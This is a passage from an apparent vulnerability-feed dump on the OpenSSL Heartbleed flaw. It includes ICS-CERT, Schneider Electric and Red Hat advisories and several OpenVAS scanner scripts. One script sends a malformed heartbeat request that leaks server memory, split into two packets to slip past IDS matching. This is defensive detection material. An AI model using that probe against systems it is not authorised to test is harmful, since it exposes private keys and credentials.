address, and company affiliation to \n[ics-cert@hq.dhs.gov](<mailto:ics-cert@hq.dhs.gov>).\n\n**NOTE: ICS-CERT has not tested the validity or efficacy of these rule sets and cautions users to thoroughly test these solutions before implementing them into production environments!**\n\n## USE OF SPECIALIZED SEARCH ENGINES\n\nEven prior to the discovery of the OpenSSL vulnerability, Internet facing devices have been a serious concern over the past few years with remote access demands giving way to insecure or vulnerable configurations. Tools; such as SHODAN, Google, and other search engines; enable researchers and adversaries to easily discover and identify a variety of ICS devices that were not intended to be Internet facing. This is due in part to ICS terminology and search terms that have become widely available because of an increasing public body of knowledge with detailed ICS information. Adding to the threat landscape is SHODAN\u2019s linkages to exploit databases as well as continuous scanning and cataloguing of devices with emerging vulnerabilities such as DNP3 and OpenSSL. The availability of public information coupled with the aforementioned tools, lowers the level of knowledge required to successfully locate Internet facing control systems. In many cases, these devices have not been configured with adequate authentication mechanisms, thereby further increasing the chances of both opportunistic and targeted attempts to directly access these components.\n\nTools such as SHODAN may be proactively used by owners, operators, and security personnel to audit their networks and devices to locate Internet facing control system devices that may be susceptible to compromise. Asset owners are encouraged to query various search engines using the vendor product, model, and version of a device, to determine if their IP address block is found within the search results. If control systems devices are found using these tools, asset owners should take the necessary steps to remove these devices from direct or unsecured Internet access as soon as possible.\n\nAs tools and adversary capabilities advance, ICS-CERT expects that exposed systems will be more effectively discovered, and targeted. It has become more important than ever for asset owners and operators to audit their network configurations and properly install their ICS devices behind patched VPNs or firewalls.\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.i\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures.\n\nICS-CERT also provides a recommended practices section for control systems on the ICS-CERT web site (http://ics-cert.us-cert.gov). Several recommended practices are available for reading or download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nOrganizations that observe any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. https://www.openssl.org/news/secadv_20140407.txt, web site last accessed May 15, 2014.\n * b. http://heartbleed.com/, web site last accessed May 15, 2014.\n * c. CWE-125: Out of Bounds Read, https://cwe.mitre.org/data/definitions/125.html, web site last accessed May 15, 2014.\n * d. CVE, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, web site last accessed May 15, 2014.\n * e. SANS OpenSSL Vulnerability, http://digital-forensics.sans.org/blog/2014/04/10/heartbleed-links-simulcast-etc/, web site last accessed May 15, 2014.\n * f. CVE, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * g. NVD, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n * h. IDS signature examples, http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/, web site last accessed May 15, 2014.\n * i. ICS-CERT ALERT, http://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-05", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-05", "title": "OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T22:47:22", "bulletinFamily": "info", "description": "## OVERVIEW\n\nSchneider Electric Wonderware\u2019s Cyber Security Team has identified an OpenSSL Heartbleed vulnerability in the Wonderware Intelligence application, caused by a third-party component. Schneider Electric Wonderware has produced a patch that mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe latest release of Schneider Electric Wonderware Intelligence Version 1.5 SP1 is not susceptible to the OpenSSL vulnerability. However, users have been known to reinstall Tableau Server, the vulnerable third-party component that is affected. Therefore, Schneider Electric Wonderware has issued a patch and a security bulletin addressing this vulnerability in all versions.\n\nTableaua has been identified as the third-party component vendor that has product vulnerable to the OpenSSL Heartbleed bug. The following Tableau products susceptible to the OpenSSL vulnerability used in the Schneider Electric Wonderware Intelligence product are:\n\n * Tableau Server ver 8.0.6 through 8.0.9\n * \u200bTableau Server ver 8.1.0 through 8.1.5.\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSchneider Electric corporate headquarters is located in Paris, France, and maintains offices in more than 100 countries worldwide.\n\nSchneider Electric Wonderware Intelligence is a real-time operations management software distributed by Schneider Electric. Schneider Electric provides automation and information technologies and systems.\n\nAccording to Schneider Electric, Wonderware Intelligence is deployed across several sectors including Critical Manufacturing, Energy, Healthcare and Public Health, and Water and Wastewater Systems. Schneider Electric states that these products are used worldwide.\n\n## VULNERABILITY CHARACTIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERb\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys. The attacker must have network access to the affected devices to exploit this vulnerability.\n\nCVE-2014-0160c has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).d\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSchneider Electric Wonderware has issued Security Advisory \u201cTableau OpenSSL Vulnerability (LFSEC00000098),\u201d available at (user registration required to access this site):\n\n<https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx>\n\nTableau has released several firmware update fixes for the OpenSSL vulnerability. Schneider Electric Wonderware has incorporated and successfully tested Wonderware Intelligence Security patch LFSec00000098 (registration required). Tableau has released the following maintenance Versions 8.1.6 and 8.0.10 on its primary and alternate download sites.\n\nThe Tableau primary customer download site (User registration required to access this site) is located here:\n\n<https://auth.tableausoftware.com/user/login?>\n\nThe Tableau alternate download site, where Version 8.1.6 for Desktop and Server (4/10/2014) is available, is located here:\n\n<https://licensing.tableausoftware.com/esdalt/>\n\nSchneider Electric Wonderware recommends customers who have enabled SSL using Tableau Server Versions 8.0.6 through 8.0.9 or 8.1.0 through 8.1.5 should apply the security update to all nodes where the Tableau Dashboard Server is installed. The process consists of uninstalling the Dashboard Server and installing the new version. The server configuration and published dashboards will be preserved during the installation of the new version.\n\nAny certificates used to configure the SSL communications are revoked, new certificates re\u2011acquired, and used after patching the vulnerability.\n\nAny passwords used for accessing the server should also be changed after applying the update.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. Tableau Software release notes http://www.tableausoftware.com/support/releases, last accessed May 15, 2014.\n * b. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-02", "title": "Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:42", "bulletinFamily": "unix", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "modified": "2018-06-06T20:24:06", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0376", "href": "https://access.redhat.com/errata/RHSA-2014:0376", "type": "redhat", "title": "(RHSA-2014:0376) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-07-17T14:28:45", "bulletinFamily": "scanner", "description": "OpenSSL is prone to an information disclosure vulnerability.", "modified": "2019-07-05T00:00:00", "published": "2014-04-09T00:00:00", "id": "OPENVAS:1361412562310103936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103936", "title": "SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103936\");\n script_version(\"2019-07-05T10:04:07+0000\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:04:07 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"SSL and TLS\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_tls_version_get.nasl\");\n script_mandatory_keys(\"ssl_tls/port\");\n\n script_xref(name:\"URL\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"mysql.inc\"); # For recv_mysql_server_handshake() in open_ssl_socket()\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ssl_funcs.inc\");\n\nfunction _broken_heartbeat( version, vtstring ) {\n\n local_var version, vtstring;\n local_var hb, payload;\n\n if( ! version )\n version = version = TLS_10;\n\n payload = raw_string( 0x01 ) + raw_string( 16384 / 256, 16384 % 256 ) + crap( length:16 ) + '------------------------->' + vtstring + '<-------------------------';\n hb = version + data_len( data:payload ) + payload;\n return hb;\n}\n\nfunction test_hb( port, version, vtstring ) {\n\n local_var port, version, vtstring;\n local_var soc, hello, data, record, hello_done, v, hb, d;\n\n soc = open_ssl_socket( port:port );\n if( ! soc )\n return FALSE;\n\n hello = ssl_hello( version:version, extensions:make_list( \"heartbeat\" ) );\n if( ! hello ) {\n close( soc );\n return FALSE;\n }\n\n send( socket:soc, data:hello );\n\n while ( ! hello_done ) {\n data = ssl_recv( socket:soc );\n if( ! data ) {\n close( soc );\n return FALSE;\n }\n\n record = search_ssl_record( data:data, search:make_array( \"handshake_typ\", SSLv3_SERVER_HELLO ) );\n if( record ) {\n if( record['extension_heartbeat_mode'] != 1 ) {\n close( soc );\n return;\n }\n }\n\n record = search_ssl_record( data:data, search:make_array( \"handshake_typ\", SSLv3_SERVER_HELLO_DONE ) );\n if( record ) {\n hello_done = TRUE;\n v = record[\"version\"];\n break;\n }\n }\n\n if( ! hello_done ) {\n close( soc );\n return FALSE;\n }\n\n # send heartbeat request in two packets to\n # work around stupid IDS which try to detect\n # attack by matching packets only\n hb = _broken_heartbeat( version:version, vtstring:vtstring );\n\n send( socket:soc, data:raw_string( 0x18 ) );\n send( socket:soc, data:hb );\n\n d = ssl_recv( socket:soc );\n\n if( strlen( d ) > 3 && string( \"->\", vtstring, \"<-\" ) >< d ) {\n security_message( port:port );\n exit( 0 );\n }\n\n if( soc )\n close( soc );\n\n return;\n}\n\nport = get_ssl_port();\nif( ! port )\n exit( 0 );\n\nif( ! versions = get_supported_tls_versions( port:port, min:SSL_v3, max:TLS_12 ) )\n exit( 0 );\n\nvt_strings = get_vt_strings();\nforeach version( versions ) {\n test_hb( port:port, version:version, vtstring:vt_strings[\"default\"] );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "description": "A vulnerability has been discovered\nin OpenSSL", "modified": "2019-03-18T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENVAS:1361412562310702896", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702896", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2896.nasl 14277 2019-03-18 14:45:38Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702896\");\n script_version(\"$Revision: 14277 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:45:38 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2896.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"openssl on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name:\"summary\", value:\"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-25T10:48:18", "bulletinFamily": "scanner", "description": "Check for the Version of openssl", "modified": "2017-07-10T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881918", "id": "OPENVAS:881918", "title": "CentOS Update for openssl CESA-2014:0376 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(881918);\n script_version(\"$Revision: 6656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:49:38 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6 \");\n\n tag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\";\n\n tag_affected = \"openssl on CentOS 6\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0376\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_summary(\"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-27T10:48:58", "bulletinFamily": "scanner", "description": "Check for the Version of openssl", "modified": "2017-07-12T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=871154", "id": "OPENVAS:871154", "title": "RedHat Update for openssl RHSA-2014:0376-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871154);\n script_version(\"$Revision: 6688 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:49:31 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n tag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\";\n\n tag_affected = \"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0376-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_summary(\"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n 